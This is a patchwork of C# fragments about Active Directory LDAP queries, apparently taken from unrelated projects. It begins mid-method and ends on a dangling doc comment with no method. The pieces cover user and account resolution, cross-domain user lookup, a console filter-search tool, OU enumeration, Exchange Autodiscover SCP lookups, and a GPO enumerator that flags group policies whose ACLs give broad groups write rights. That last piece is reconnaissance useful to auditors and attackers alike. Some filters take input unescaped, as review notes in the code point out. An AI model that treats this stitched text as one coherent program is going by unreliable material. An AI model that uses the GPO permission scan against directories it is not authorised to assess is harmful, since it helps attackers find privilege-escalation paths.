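                    ado.internalSid = new SecurityIdentifier((byte[])de.Properties["objectSid"][0], 0);
                }
                ado.state = ADObjectState.Resolved;
                return (ado);
            }

            // Pass 2: substring match. The wildcards are part of the filter template; the
            // value between them is still escaped.
            if (usersOnly)
            {
                deSearch.Filter = String.Format("(&(|(displayName=*{0}*)(samaccountname=*{0}*)(userprincipalname=*{0}*))(&(objectClass=user)(objectCategory=person)))", filterValue);
            }
            else if (usersAndGroups)
            {
                deSearch.Filter = String.Format("(&(|(displayName=*{0}*)(samaccountname=*{0}*)(userprincipalname=*{0}*))(|(&(objectClass=user)(objectCategory=person))(objectClass=group)))", filterValue);
            }
            results.Dispose();
            results = deSearch.FindAll();

            if (results.Count == 0)
            {
                // Pass 3: well-known SIDs and other account names the directory search did not return.
                try
                {
                    NTAccount nta = new NTAccount(name);
                    SecurityIdentifier sid = (SecurityIdentifier)nta.Translate(typeof(SecurityIdentifier));
                    nta = (NTAccount)sid.Translate(typeof(NTAccount));
                    ado.Name = nta.Value;
                    ado.ADSPath = String.Format("LDAP://<SID={0}>", sid.Value);
                    ado.UPN = nta.Value;
                    ado.internalSid = sid;
                    ado.state = ADObjectState.Resolved;
                    return (ado);
                }
                catch
                {
                    // Not a translatable account name: fall through to NotFound.
                }
                ado.Name = name;
                ado.state = ADObjectState.NotFound;
                return (ado);
            }

            // Several candidates: publish them in the session for the caller to choose from.
            List<ADObject> proposedADObjects = new List<ADObject>();
            this.Session["proposedADObjects"] = proposedADObjects;
            foreach (SearchResult sr in results)
            {
                using (DirectoryEntry de = sr.GetDirectoryEntry())
                {
                    ADObject proposal = new ADObject();
                    proposal.Name = (string)de.InvokeGet("samaccountname");
                    proposal.ADSPath = de.Path;
                    proposal.ClassName = de.SchemaClassName;
                    proposal.UPN = (string)de.InvokeGet("userPrincipalName");
                    proposal.internalSid = new SecurityIdentifier((byte[])de.Properties["objectSid"][0], 0);
                    proposedADObjects.Add(proposal);
                }
            }
            ado.Name = name;
            ado.state = ADObjectState.Multiple;
            return (ado);
        }
        catch
        {
            // Best-effort: hand back whatever was filled in so far.
            return (ado);
        }
        finally
        {
            results.Dispose();
        }
    }
}

/// <summary>
/// Escapes a value for use as an assertion value inside an LDAP search filter (RFC 4515).
/// </summary>
private static string EscapeFilterValue(string value)
{
    var escaped = new System.Text.StringBuilder(value.Length + 8);
    foreach (char c in value)
    {
        switch (c)
        {
            case '\\': escaped.Append(@"\5c"); break;
            case '*': escaped.Append(@"\2a"); break;
            case '(': escaped.Append(@"\28"); break;
            case ')': escaped.Append(@"\29"); break;
            case '\0': escaped.Append(@"\00"); break;
            default: escaped.Append(c); break;
        }
    }
    return escaped.ToString();
}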
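/// <summary>
/// Searches every configured domain for enabled user accounts matching the given first and
/// last name and returns them in the shared result table.
/// </summary>
/// <param name="sLastNameSearch">Last name (sn) to match; '*' is honoured as a wildcard.</param>
/// <param name="sFirstNameSearch">First name (givenName) to match; '*' is honoured as a wildcard.</param>
/// <returns>
/// The shared table, cleared and refilled with one row per enabled account
/// (LastName, FirstName, Username, UserDomain, Phone, Email).
/// </returns>
public static DataTable LookForUserInAllDomains(string sLastNameSearch, string sFirstNameSearch)
{
    // Blank stored credentials mean "bind as the current identity".
    if (sUID == "") sUID = null;
    if (sPwd == "") sPwd = null;

    CreateNetworkUserTable();
    objTable.Rows.Clear();

    // The search terms are caller-supplied. Escape the characters that would change the
    // structure of the filter, while leaving '*' usable as a wildcard.
    string sFilter = String.Format("(|(&(objectClass=User)(givenname={0})(sn={1})))",
        EscapeLdapSearchValue(sFirstNameSearch), EscapeLdapSearchValue(sLastNameSearch));

    string[] sDomains = sLDAPDomains.Split(new char[] { ';' });
    for (int i = 0; i < sDomains.Length; i++)
    {
        string sDomainName = sDomains[i];
        string sServerName = System.Configuration.ConfigurationManager.AppSettings[sDomainName].ToString();
        string sLDAPPath = "LDAP://" + sServerName + "/DC=" + sDomainName + ",DC=root01,DC=org";

        // using blocks release the bind (which carries the service credentials) on every
        // path, including the early "continue" and exceptions thrown while reading results.
        using (DirectoryEntry objRootDE = new DirectoryEntry(sLDAPPath, sUID, sPwd, AuthenticationTypes.Secure))
        using (DirectorySearcher objDS = new DirectorySearcher(objRootDE))
        {
            objDS.Filter = sFilter;
            objDS.ReferralChasing = ReferralChasingOption.None;
            objDS.PropertiesToLoad.Add("userAccountControl");
            objDS.PropertiesToLoad.Add("SAMAccountName");
            objDS.PropertiesToLoad.Add("givenName");
            objDS.PropertiesToLoad.Add("sn");
            objDS.PropertiesToLoad.Add("TelephoneNumber");
            objDS.PropertiesToLoad.Add("mail");

            SearchResultCollection objSRC = null;
            try
            {
                objSRC = objDS.FindAll();
            }
            catch (Exception excpt)
            {
                // An unreachable server only skips this domain; anything else is rethrown.
                // NOTE(review): matching on the message text presumably breaks on localized
                // systems - confirm, and prefer an error code if one is available.
                if (excpt.Message.IndexOf("The server is not operational.") < 0) throw;
            }
            if (objSRC == null) continue;

            using (objSRC)
            {
                foreach (SearchResult objSR in objSRC)
                {
                    int iInactiveFlag = Convert.ToInt32(objSR.Properties["userAccountControl"][0]);
                    string sUserId = objSR.Properties["SAMAccountName"][0].ToString();
                    string sFirstName = objSR.Properties["givenName"][0].ToString();
                    string sLastName = objSR.Properties["sn"][0].ToString();
                    string sPhone = "";
                    string sEmail = "";
                    if (objSR.Properties["TelephoneNumber"].Count > 0) sPhone = objSR.Properties["TelephoneNumber"][0].ToString();
                    if (objSR.Properties["mail"].Count > 0) sEmail = objSR.Properties["mail"][0].ToString();

                    // Bit 0x0002 of userAccountControl marks a disabled account; only enabled
                    // accounts are reported.
                    iInactiveFlag = iInactiveFlag & 0x0002;
                    if (iInactiveFlag <= 0)
                    {
                        DataRow objRow = objTable.NewRow();
                        objRow["LastName"] = sLastName;
                        objRow["FirstName"] = sFirstName;
                        objRow["Username"] = sUserId;
                        objRow["UserDomain"] = sDomainName;
                        objRow["Phone"] = sPhone;
                        objRow["Email"] = sEmail;
                        objTable.Rows.Add(objRow);
                    }
                }
            }
        }
    }
    return objTable;
}

/// <summary>
/// Escapes the characters that would change the structure of an LDAP filter
/// (backslash, parentheses, NUL). '*' is deliberately left untouched so that
/// callers can keep using wildcard searches.
/// </summary>
private static string EscapeLdapSearchValue(string value)
{
    if (string.IsNullOrEmpty(value)) return string.Empty;

    var escaped = new System.Text.StringBuilder(value.Length + 8);
    foreach (char c in value)
    {
        switch (c)
        {
            case '\\': escaped.Append(@"\5c"); break;
            case '(': escaped.Append(@"\28"); break;
            case ')': escaped.Append(@"\29"); break;
            case '\0': escaped.Append(@"\00"); break;
            default: escaped.Append(c); break;
        }
    }
    return escaped.ToString();
}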
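/// <summary>
/// Runs an LDAP search with the given filter and prints the results to the console.
/// </summary>
/// <remarks>
/// When the first configured attribute is "meta" (case-insensitive), only the property names
/// of the first match are printed. Otherwise every match is printed with its path, followed
/// by all attribute values, or only the configured attributes when any are configured.
/// Search failures are reported on the console and not rethrown.
/// </remarks>
/// <param name="qFilter">LDAP filter, used as supplied.</param>
/// <param name="sizeLimit">Value assigned to the searcher's SizeLimit.</param>
public void SearchByFiter(string qFilter, int sizeLimit)
{
    // The searcher and the result collection hold native ADSI resources; release them on every path.
    using (DirectorySearcher searcher = new DirectorySearcher(this.directoryEntry)
    {
        PageSize = int.MaxValue,
        Filter = qFilter,
        SizeLimit = sizeLimit
    })
    {
        Console.WriteLine($"[*] Query: {searcher.Filter}\n");
        try
        {
            bool hasAttrFilter = Config.Directory.Attrs.Count != 0;

            if (hasAttrFilter && Config.Directory.Attrs.First().Equals("meta", StringComparison.OrdinalIgnoreCase))
            {
                var resultOne = searcher.FindOne();
                if (resultOne != null)
                {
                    foreach (var p in resultOne.Properties.PropertyNames)
                    {
                        Console.WriteLine($"{p}");
                    }
                }
                return;
            }

            using (SearchResultCollection result = searcher.FindAll())
            {
                if (result == null)
                {
                    return;
                }

                foreach (SearchResult sr in result)
                {
                    Console.WriteLine($"{sr.Path}");
                    foreach (DictionaryEntry p in sr.Properties)
                    {
                        var values = p.Value as ResultPropertyValueCollection;
                        if (values == null)
                        {
                            continue;
                        }

                        string attrName = p.Key.ToString();
                        bool wanted = !hasAttrFilter
                            || Config.Directory.Attrs.Any(s => s.Equals(attrName, StringComparison.OrdinalIgnoreCase));
                        if (!wanted)
                        {
                            continue;
                        }

                        foreach (var d in values)
                        {
                            printAttribute(attrName, d);
                        }
                    }
                }
            }
        }
        catch (Exception e)
        {
            Console.WriteLine($"Filter failed: {e.Message}");
        }
    }
}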
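/// <summary>
/// Walks the children of <paramref name="directory"/> and mirrors organizational units,
/// containers and users into <paramref name="root"/>. Units and containers are added only
/// when a search below them finds at least one user, and are then descended into.
/// </summary>
/// <param name="root">Node that receives the discovered children.</param>
/// <param name="directory">Directory entry whose children are enumerated.</param>
private static void EnumerateUsers(DomainInformation root, DirectoryEntry directory)
{
    foreach (DirectoryEntry child in directory.Children)
    {
        string schemaClass = child.SchemaClassName;
        bool isUser = schemaClass == "user";
        bool isOrgUnit = schemaClass == "organizationalUnit";
        if (!isUser && !isOrgUnit && schemaClass != "container")
        {
            continue;
        }

        // A user object is always listed; only units and containers need the "has users" query.
        if (!isUser && !ContainsUsers(child))
        {
            continue;
        }

        object description = child.Properties["description"].Value;
        var item = new DomainInformation()
        {
            // Containers are reported with the organizational-unit type, like OUs.
            Type = isUser ? DomainInformationTypeEnum.User : DomainInformationTypeEnum.OrganizationUnit,
            Name = child.Name.Replace(isOrgUnit ? "OU=" : "CN=", ""),
            Description = description != null ? description.ToString() : string.Empty
        };
        if (isUser)
        {
            item.Info = ParseUserInfo(child);
        }

        // Skip entries already present under this node (same name and description).
        if (root.Childrens.Any(x => x.Name == item.Name && x.Description == item.Description))
        {
            continue;
        }

        root.Childrens.Add(item);
        if (!isUser)
        {
            EnumerateUsers(item, child);
        }
    }
}

/// <summary>Returns true when a search below <paramref name="container"/> finds at least one user.</summary>
private static bool ContainsUsers(DirectoryEntry container)
{
    // Dispose the searcher and the result collection: one query runs per visited container,
    // so leaked handles would add up quickly on a large directory.
    using (var searcher = new DirectorySearcher(container)
    {
        Filter = "((&(objectCategory=Person)(objectClass=User)))"
    })
    using (SearchResultCollection matches = searcher.FindAll())
    {
        return matches.Count != 0;
    }
}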
/// <summary>
/// Builds the list of schema classes that declare <paramref name="auxClassName"/> as a
/// system auxiliary class, followed by <paramref name="auxClassName"/> itself.
/// </summary>
/// <param name="auxClassName">
/// Class name to look up. It is placed in the search filter as-is.
/// NOTE(review): presumably this is always a fixed internal class name; verify against the callers.
/// </param>
/// <returns>The ldapDisplayName of every matching class, then <paramref name="auxClassName"/>.</returns>
/// <exception cref="PrincipalOperationException">
/// The rootDSE exposes no schemaNamingContext, or a search result has no ldapDisplayName entry.
/// </exception>
private List<string> PopulatAuxObjectList(string auxClassName)
{
    try
    {
        // Step 1: ask the rootDSE where the schema lives.
        string rootDsePath = "LDAP://" + this.userSuppliedServerName + "/rootDSE";
        string rootUser = this.credentials != null ? this.credentials.UserName : null;
        string rootPassword = this.credentials != null ? this.credentials.Password : null;

        string schemaNamingContext;
        using (DirectoryEntry rootDse = new DirectoryEntry(rootDsePath, rootUser, rootPassword, this.authTypes))
        {
            if (rootDse.Properties["schemaNamingContext"].Count == 0)
            {
                throw new PrincipalOperationException(StringResources.ADAMStoreUnableToPopulateSchemaList);
            }

            schemaNamingContext = (string)rootDse.Properties["schemaNamingContext"].Value;
        }

        // Step 2: search the schema container for classes that list the auxiliary class.
        string schemaPath = "LDAP://" + this.userSuppliedServerName + "/" + schemaNamingContext;
        string schemaUser = this.credentials != null ? this.credentials.UserName : null;
        string schemaPassword = this.credentials != null ? this.credentials.Password : null;

        using (DirectoryEntry schemaEntry = new DirectoryEntry(schemaPath, schemaUser, schemaPassword, this.authTypes))
        using (DirectorySearcher schemaSearcher = new DirectorySearcher(schemaEntry))
        {
            schemaSearcher.Filter = "(&(objectClass=classSchema)(systemAuxiliaryClass=" + auxClassName + "))";
            schemaSearcher.PropertiesToLoad.Add("ldapDisplayName");

            List<string> classNames = new List<string>();
            using (SearchResultCollection matches = schemaSearcher.FindAll())
            {
                foreach (SearchResult match in matches)
                {
                    if (match.Properties["ldapDisplayName"] == null)
                    {
                        throw new PrincipalOperationException(StringResources.ADAMStoreUnableToPopulateSchemaList);
                    }

                    classNames.Add(match.Properties["ldapDisplayName"][0].ToString());
                }
            }

            // The auxiliary class itself always closes the list.
            classNames.Add(auxClassName);
            return classNames;
        }
    }
    catch (COMException comError)
    {
        // Translate the raw COM failure into the library's own exception type.
        throw ExceptionHelper.GetExceptionFromCOMException(comError);
    }
}
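/// <summary>
/// Runs a test LDAP search and appends the outcome to the <c>tbLdap</c> text box; the box is
/// tinted while the search is being set up and run.
/// </summary>
/// <param name="ldapPath">ADsPath to bind to; it is upper-cased before use.</param>
/// <param name="ldapFilter">LDAP filter, used as supplied.</param>
/// <param name="userName">Account to bind with; an empty string binds as the current identity.</param>
/// <param name="password">Password for <paramref name="userName"/>; only read when a user name is given.</param>
/// <param name="findOne">True to show only the first match (name and path); false to list the path of every match.</param>
private void TestLookup(string ldapPath, string ldapFilter, string userName, SecureString password, bool findOne)
{
    Dispatcher.BeginInvoke(DispatcherPriority.Background,
        new Action(() => { tbLdap.Background = new SolidColorBrush(Colors.LightGoldenrodYellow); }));

    using (var de = new DirectoryEntry(ldapPath.ToUpper()))
    {
        if (userName != String.Empty)
        {
            IntPtr bstr = Marshal.SecureStringToBSTR(password);
            try
            {
                de.Username = userName;
                // DirectoryEntry only accepts a managed string, so a clear-text copy of the
                // password is unavoidable here; it lives as long as the entry does.
                de.Password = Marshal.PtrToStringBSTR(bstr);
            }
            finally
            {
                // Wipe the unmanaged copy before freeing it, also when an exception is thrown.
                Marshal.ZeroFreeBSTR(bstr);
            }
        }
        de.AuthenticationType = AuthenticationTypes.Secure;

        using (var ds = new DirectorySearcher(de)
        {
            Filter = ldapFilter,
            SearchScope = SearchScope.Subtree,
            PageSize = 1000
        })
        {
            try
            {
                if (findOne)
                {
                    SearchResult sr = ds.FindOne();
                    using (DirectoryEntry found = sr.GetDirectoryEntry())
                    {
                        // Read the values here, not inside the UI callback: the entry is disposed
                        // before the callback runs, and a bind failure is then handled by the
                        // catch below instead of surfacing on the dispatcher thread.
                        string line = found.Name + Environment.NewLine + found.Path + "\r\n";
                        Dispatcher.BeginInvoke(DispatcherPriority.Background,
                            new Action(() => { tbLdap.Text = tbLdap.Text + line; }));
                    }
                }
                else
                {
                    using (SearchResultCollection rsc = ds.FindAll())
                    {
                        foreach (SearchResult sr in rsc)
                        {
                            string path = sr.Path;
                            Dispatcher.BeginInvoke(DispatcherPriority.Background,
                                new Action(() => { tbLdap.Text = tbLdap.Text + path + "\r\n"; }));
                        }
                    }
                }
            }
            catch (Exception ex)
            {
                string message = ex.Message;
                Dispatcher.BeginInvoke(DispatcherPriority.Background,
                    new Action(() => { tbLdap.Text = tbLdap.Text + message + "\r\n"; }));
            }
            finally
            {
                Dispatcher.BeginInvoke(DispatcherPriority.Background,
                    new Action(() => { tbLdap.Background = new SolidColorBrush(Colors.Azure); }));
            }
        }
    }
}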
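/// <summary>
/// Looks up the Autodiscover service connection point (SCP) records in Active Directory and
/// returns a text log of the lookup, optionally followed by a test POST to each URL found.
/// </summary>
/// <param name="bDoPosts">
/// True to POST to each record's serviceBindingInformation URL (URLs starting with "LDAP:" are skipped).
/// </param>
/// <returns>The log text, including the details of any handled error.</returns>
private string DoAdLookups(bool bDoPosts)
{
    string sRet = string.Empty;
    bool bFail = false;
    string sMailbox = txtTargetMailbox.Text.Trim();
    StringBuilder oSB = new StringBuilder();

    DirectoryEntry oRootDSE = null;
    DirectoryEntry oQuery = null;
    DirectorySearcher oDirectorySearcher = null;
    SearchResultCollection oSearchResultCollection = null;

    this.Cursor = Cursors.WaitCursor;
    try
    {
        oSB.AppendFormat("- DoAdLookups - Find SCP records: {0}\r\n", DateTime.Now);

        // #1 Get AD entries
        try
        {
            oSB.Append(" Start inital binding to LDAP://rootDSE\r\n");
            oRootDSE = new DirectoryEntry("LDAP://rootDSE");
            oSB.Append(" Finished binding to LDAP://rootDSE\r\n");

            oSB.Append(" Obtaining configurationNamingContext - if it fails then Autodiscover should be used.\r\n");
            string ConfigurationNamingContext = (string)oRootDSE.Properties["configurationNamingContext"].Value;
            oSB.AppendFormat(" configurationNamingContext {0}\r\n", ConfigurationNamingContext);

            string sQuery = "LDAP://" + ConfigurationNamingContext;
            oSB.AppendFormat(" Query: {0}\r\n", sQuery);

            string sFilter = "(&(objectcategory=serviceConnectionPoint)(|(keywords=67661D7F-8FC4-4fa7-BFAC-E1D7794C1F68)( keywords=77378F46-2C66-4aa9-A6A6-3E7A48B19596)))";
            oSB.AppendFormat(" Filter: {0}\r\n", sFilter);

            oQuery = new DirectoryEntry(sQuery);
            oDirectorySearcher = new DirectorySearcher(oQuery);
            oDirectorySearcher.PropertiesToLoad.Add("cn");
            oDirectorySearcher.PropertiesToLoad.Add("name");
            oDirectorySearcher.PropertiesToLoad.Add("serviceBindingInformation");
            oDirectorySearcher.PropertiesToLoad.Add("legacyExchangeDN");
            oDirectorySearcher.PropertiesToLoad.Add("Domain");
            oDirectorySearcher.PropertiesToLoad.Add("site");
            oDirectorySearcher.PropertiesToLoad.Add("keywords");
            oDirectorySearcher.Filter = sFilter;

            oSB.Append("\r\n");
            oSB.AppendFormat("+ Searching AD for CAS URLs: {0}\r\n", DateTime.Now);
            DateTime oStart = DateTime.Now;
            oSearchResultCollection = oDirectorySearcher.FindAll();
            TimeSpan oTimeSpan = DateTime.Now.Subtract(oStart);
            oSB.AppendFormat(" Time to do Search: {0} miliseconds\r\n", oTimeSpan.TotalMilliseconds.ToString());
            oSB.AppendFormat("- Searching AD for CAS URLs: {0}\r\n", DateTime.Now);
        }
        catch (Exception ex)
        {
            // One handler covers every exception type, and it logs the exception that was
            // actually caught rather than a freshly constructed, empty one.
            bFail = true;
            Console.WriteLine(ex.Message);
            AppendLookupError(oSB, ex, "!! Error: ", "", "- Searching: {0}\r\n");
        }

        string computerSiteName;
        using (System.DirectoryServices.ActiveDirectory.ActiveDirectorySite site =
                   System.DirectoryServices.ActiveDirectory.ActiveDirectorySite.GetComputerSite())
        {
            computerSiteName = site.Name;
        }
        // Append, not AppendFormat: the site name is data and must not be parsed as a format string.
        oSB.Append("Site Name: " + computerSiteName + "\r\n");

        if (bFail != true)
        {
            oSB.Append("\r\n");
            oSB.AppendFormat(" Results found: {0} URLs\r\n", oSearchResultCollection.Count.ToString());
            oSB.AppendFormat("+ List Results: {0}\r\n", DateTime.Now);
            oSB.Append("\r\n");

            string sUrl = string.Empty;
            string[] aLoggedProperties = { "cn", "name", "serviceBindingInformation", "legacyExchangeDN", "Domain", "site" };

            try
            {
                foreach (SearchResult oSearchResult in oSearchResultCollection)
                {
                    oSB.AppendFormat(" Result Path: {0}\r\n", oSearchResult.Path);
                    foreach (string sProperty in aLoggedProperties)
                    {
                        if (oSearchResult.Properties[sProperty].Count != 0)
                        {
                            oSB.Append(" ").Append(sProperty).Append(": ")
                               .Append(oSearchResult.Properties[sProperty][0].ToString()).Append("\r\n");
                        }
                    }

                    // (Ordering the SCP URLs by site keyword is not implemented; records are
                    // handled in the order the directory returns them.)

                    if (bDoPosts == true)
                    {
                        oSB.Append("\r\n");
                        if (oSearchResult.Properties["serviceBindingInformation"].Count == 0)
                        {
                            oSB.Append(" ! Skipping POST due to missing serviceBindingInformation\r\n");
                        }
                        else
                        {
                            // The URL comes from the directory record, and the mailbox address is
                            // sent to whatever it names.
                            // NOTE(review): DoPostToUrl is not visible here - confirm that it requires
                            // https and leaves server certificate validation enabled.
                            sUrl = oSearchResult.Properties["serviceBindingInformation"][0].ToString();
                            if (sUrl.StartsWith("LDAP:", StringComparison.OrdinalIgnoreCase))
                            {
                                oSB.Append(" ! Skipping POST due to URL starting with LDAP\r\n");
                            }
                            else
                            {
                                int iTimeoutSeconds = Int32.Parse(cmboTimeout.Text.Trim());
                                oSB.Append(DoPostToUrl(sUrl, sMailbox, iTimeoutSeconds));
                            }
                        }
                    }

                    oSB.Append("\r\n");
                    oSB.Append("--------\r\n");
                    oSB.Append("\r\n");
                }
                oSB.AppendFormat("- List Results: {0}\r\n", DateTime.Now);
            }
            catch (System.Runtime.InteropServices.COMException ex)
            {
                bFail = true;
                Console.WriteLine(ex);
                AppendLookupError(oSB, ex, "!! Error", "\r\n", "- List Results: {0}\r\n");
            }
            catch (InvalidOperationException ex)
            {
                bFail = true;
                Console.WriteLine(ex.Message);
                AppendLookupError(oSB, ex, "!! Error", "\r\n", "- List Results: {0}\r\n");
            }
            catch (NotSupportedException ex)
            {
                bFail = true;
                Console.WriteLine(ex.Message);
                AppendLookupError(oSB, ex, "!! Error", "\r\n", "- List Results: {0}\r\n");
            }
        }

        oSB.AppendFormat("- DoAdLookups - Find SCP records: {0}\r\n", DateTime.Now);
        sRet = oSB.ToString();
    }
    finally
    {
        // Release the directory handles and restore the cursor even when an exception escapes.
        if (oSearchResultCollection != null) oSearchResultCollection.Dispose();
        if (oDirectorySearcher != null) oDirectorySearcher.Dispose();
        if (oQuery != null) oQuery.Dispose();
        if (oRootDSE != null) oRootDSE.Dispose();
        this.Cursor = Cursors.Default;
    }

    return (sRet);
}

/// <summary>Appends the details of a handled exception to the lookup log.</summary>
private static void AppendLookupError(StringBuilder oSB, Exception ex, string sHeader, string sSeparator, string sFooterFormat)
{
    oSB.Append(sHeader);
    oSB.AppendFormat(" Message: {0}\r\n", ex.Message);
    oSB.AppendFormat(" InnerException: {0}\r\n", ex.InnerException);
    oSB.Append(sSeparator);
    oSB.AppendFormat(" StackTrace: {0}\r\n", ex.StackTrace);
    oSB.AppendFormat(sFooterFormat, DateTime.Now);
}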
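/// <summary>
/// Enumerates every groupPolicyContainer object visible from the domain's
/// global catalog and returns its basic attributes plus a filtered view of
/// its security descriptor.
/// </summary>
/// <returns>
/// A <see cref="JObject"/> keyed by the GPO's "name" attribute. Each value holds
/// "Display Name", "UID", "Distinguished Name", "Created", "GPO Status" and,
/// when any entries survive filtering, "ACLs".
/// </returns>
/// <remarks>
/// Any exception is written through Utility.DebugWrite, after which the method
/// waits for a key press and terminates the process with exit code 1; callers
/// therefore never observe the trailing <c>null</c> return in practice.
/// When GlobalVar.UserDefinedDomainDn is set, the binds use the explicit
/// username/password from GlobalVar.
/// </remarks>
public static JObject GetDomainGpos()
{
    // Rights that make an ACE worth reporting when held by a broad trustee.
    string[] interestingRights =
    {
        "WRITE_OWNER", "CREATE_CHILD", "WRITE_PROPERTY", "WRITE_DAC", "SELF_WRITE", "CONTROL_ACCESS"
    };

    // Trustee suffixes treated as expected (hidden at the default level) and as broad.
    // NOTE(review): these are plain suffix matches on the "SID" value produced by
    // ParseSddl; any trustee string that merely ends in one of the "boring" suffixes
    // is scored 0 and may be hidden from the report. Confirm the parser's output
    // format before relying on this as an audit control.
    string[] boringSidEndings =
    {
        "-3-0", "-5-9", "5-18", "-512", "-519", "SY", "BA", "DA", "CO", "ED", "PA", "CG", "DD", "EA", "LA",
    };
    string[] interestingSidEndings =
    {
        "DU", "WD", "IU", "BU", "AN", "AU", "BG", "DC", "DG", "LG"
    };

    try
    {
        DirectoryEntry rootDse;
        DirectoryEntry root;
        DirectoryEntry rootExtRightsContext;

        if (GlobalVar.UserDefinedDomainDn != null)
        {
            // Explicit domain: bind with the user-supplied credentials.
            rootDse = new DirectoryEntry(("LDAP://" + GlobalVar.UserDefinedDomain + "/rootDSE"), GlobalVar.UserDefinedUsername, GlobalVar.UserDefinedPassword);
            root = new DirectoryEntry(("GC://" + rootDse.Properties["defaultNamingContext"].Value), GlobalVar.UserDefinedUsername, GlobalVar.UserDefinedPassword);
            string schemaContextString = rootDse.Properties["schemaNamingContext"].Value.ToString();
            rootExtRightsContext = new DirectoryEntry("LDAP://" + schemaContextString.Replace("Schema", "Extended-Rights"), GlobalVar.UserDefinedUsername, GlobalVar.UserDefinedPassword);
        }
        else
        {
            // No domain given: use the caller's current logon context.
            rootDse = new DirectoryEntry("LDAP://rootDSE");
            root = new DirectoryEntry("GC://" + rootDse.Properties["defaultNamingContext"].Value);
            string schemaContextString = rootDse.Properties["schemaNamingContext"].Value.ToString();
            rootExtRightsContext = new DirectoryEntry("LDAP://" + schemaContextString.Replace("Schema", "Extended-Rights"));
        }

        // The extended-rights GUID-to-name lookup that consumed rootExtRightsContext
        // is disabled; the entry is still built so a missing schemaNamingContext
        // fails here exactly as before, and it is disposed with the others.
        using (rootDse)
        using (root)
        using (rootExtRightsContext)
        using (DirectorySearcher gpoSearcher = new DirectorySearcher(root)
        {
            Filter = "(objectClass=groupPolicyContainer)",
            SecurityMasks = SecurityMasks.Dacl | SecurityMasks.Owner
        })
        using (SearchResultCollection gpoSearchResults = gpoSearcher.FindAll())
        {
            // Container for the data of every GPO, keyed by GPO UID.
            JObject gposData = new JObject();

            foreach (SearchResult gpoSearchResult in gpoSearchResults)
            {
                // Each result's DirectoryEntry holds a native handle; release it per GPO.
                using (DirectoryEntry gpoDe = gpoSearchResult.GetDirectoryEntry())
                {
                    JObject gpoData = new JObject();

                    string gpoDispName = gpoDe.Properties["displayName"].Value.ToString();
                    gpoData.Add("Display Name", gpoDispName);
                    string gpoUid = gpoDe.Properties["name"].Value.ToString();

                    // Default Domain Policy and Default Domain Controllers Policy use
                    // well-known GUIDs, so a second domain yields duplicate UIDs.
                    // Only the first occurrence is kept.
                    if (gposData[gpoUid] != null)
                    {
                        Utility.DebugWrite("\nI think you're in a multi-domain environment cos I just saw two GPOs with the same GUID. You should be careful not to miss stuff in the Default Domain Policy and Default Domain Controller Policy.");
                        continue;
                    }

                    gpoData.Add("UID", gpoUid);
                    string gpoDn = gpoDe.Properties["distinguishedName"].Value.ToString();
                    gpoData.Add("Distinguished Name", gpoDn);
                    string gpoCreated = gpoDe.Properties["whenCreated"].Value.ToString();
                    gpoData.Add("Created", gpoCreated);

                    // flags: 3 = all disabled, 2 = computer configuration disabled,
                    //        1 = user policy disabled, 0 = all enabled
                    string gpoFlags = gpoDe.Properties["flags"].Value.ToString();
                    string gpoEnabledStatus;
                    switch (gpoFlags)
                    {
                        case "0":
                            gpoEnabledStatus = "Enabled";
                            break;
                        case "1":
                            gpoEnabledStatus = "User Policy Disabled";
                            break;
                        case "2":
                            gpoEnabledStatus = "Computer Policy Disabled";
                            break;
                        case "3":
                            gpoEnabledStatus = "Disabled";
                            break;
                        default:
                            gpoEnabledStatus = "Couldn't process GPO Enabled Status. Weird.";
                            break;
                    }
                    gpoData.Add("GPO Status", gpoEnabledStatus);

                    // Read the full security descriptor as SDDL and parse it.
                    ActiveDirectorySecurity gpoAcl = gpoDe.ObjectSecurity;
                    JObject gpoAclJObject = new JObject();
                    string sddlString = gpoAcl.GetSecurityDescriptorSddlForm(AccessControlSections.All);
                    JObject parsedSDDL = ParseSddl.ParseSddlString(sddlString, SecurableObjectType.DirectoryServiceObject);

                    foreach (KeyValuePair<string, JToken> thing in parsedSDDL)
                    {
                        if (thing.Key == "Owner")
                        {
                            gpoAclJObject.Add("Owner", thing.Value.ToString());
                            continue;
                        }

                        if (thing.Key == "Group")
                        {
                            gpoAclJObject.Add("Group", thing.Value);
                            continue;
                        }

                        if (thing.Key != "DACL")
                        {
                            continue;
                        }

                        foreach (JProperty ace in thing.Value.Children())
                        {
                            // Score: 10 = broad trustee with a write-type right,
                            //         0 = expected trustee, 1 = everything else.
                            int aceInterestLevel = 1;

                            bool interestingRightPresent = false;
                            if (ace.Value["Rights"] != null)
                            {
                                foreach (string right in interestingRights)
                                {
                                    if (ace.Value["Rights"].Contains(right))
                                    {
                                        interestingRightPresent = true;
                                    }
                                }
                            }

                            string trusteeSid = ace.Value["SID"].ToString();

                            // Ordinal comparison: SIDs and SDDL aliases are identifiers,
                            // not linguistic text, so culture rules must not apply.
                            bool boringUserPresent = false;
                            foreach (string boringSidEnding in boringSidEndings)
                            {
                                if (trusteeSid.EndsWith(boringSidEnding, StringComparison.Ordinal))
                                {
                                    boringUserPresent = true;
                                    break;
                                }
                            }

                            bool interestingUserPresent = false;
                            foreach (string interestingSidEnding in interestingSidEndings)
                            {
                                if (trusteeSid.EndsWith(interestingSidEnding, StringComparison.Ordinal))
                                {
                                    interestingUserPresent = true;
                                    break;
                                }
                            }

                            if (interestingUserPresent && interestingRightPresent)
                            {
                                aceInterestLevel = 10;
                            }
                            else if (boringUserPresent)
                            {
                                aceInterestLevel = 0;
                            }

                            if (aceInterestLevel >= GlobalVar.IntLevelToShow)
                            {
                                // Pass the whole ACE through unchanged.
                                gpoAclJObject.Add(ace);
                            }
                        }
                    }

                    // Attach the ACL summary only when something was kept.
                    if (gpoAclJObject.HasValues)
                    {
                        gpoData.Add("ACLs", gpoAclJObject);
                    }

                    gposData.Add(gpoUid, gpoData);
                }
            }

            return gposData;
        }
    }
    catch (Exception exception)
    {
        // Fatal by design: report, wait for the operator, then exit the process.
        Utility.DebugWrite(exception.ToString());
        Console.ReadKey();
        Environment.Exit(1);
    }

    return null;
}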
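/// <summary>
/// Gets all users of a given domain.
/// </summary>
/// <param name="domain">Domain to query. Should be given in the form ldap://domain.com/ </param>
/// <param name="username">
/// Account used for the bind. When null or empty, the bind is made without
/// explicit credentials (the single-argument DirectoryEntry constructor).
/// </param>
/// <param name="password">Password for <paramref name="username"/>; ignored when no username is given.</param>
/// <returns>
/// A list of users. If the search fails, a message box is shown and the users
/// collected up to that point (possibly none) are returned.
/// </returns>
/// <remarks>
/// NOTE(review): the password travels as a plain string and is handed to
/// DirectoryEntry; how it is protected on the wire depends on the path scheme
/// and authentication type in effect, which this method does not set. Confirm
/// the bind is made over a protected channel.
/// </remarks>
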